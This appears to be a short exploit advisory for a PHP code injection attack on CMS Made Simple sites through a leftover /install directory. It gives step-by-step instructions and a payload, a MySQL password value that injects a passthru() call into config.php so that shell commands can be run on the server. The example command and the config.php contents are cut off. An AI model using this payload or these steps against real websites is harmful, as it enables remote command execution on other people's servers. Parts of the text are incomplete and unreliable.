# CMS Made Simple PHP Code Injection Vulnerability (All versions)
# SAHM (@post.com)
# All versions
A malicious attacker can intrude every CMSMS-installed website by taking the following steps:
Open the /install folder from the URL (The cms doesn't force users to delete the directory after finishing the installation progress).
Pass through the steps to get to the fifth step.
In a remote host, install a MySQL server and create the following user:
password : '.passthru($_GET['command']);exit;//
Following that, Create a remotely accessible database and grant all privileges to the user (for further information please read : http://www.cyberciti.biz/tips/how-do-i-enable-remote-access-to-mysql-database-server.html) .
Fill in the Database Information form (bottom of the page).
db host address: the remote host's IP
database name: the name of the remote database which has been built
After installation, commands can be injected as:
At this point, the config.php file content would be something like this:
# CMS Made Simple Configuration File
# Documentation: /doc/CMSMS_config_reference.pdf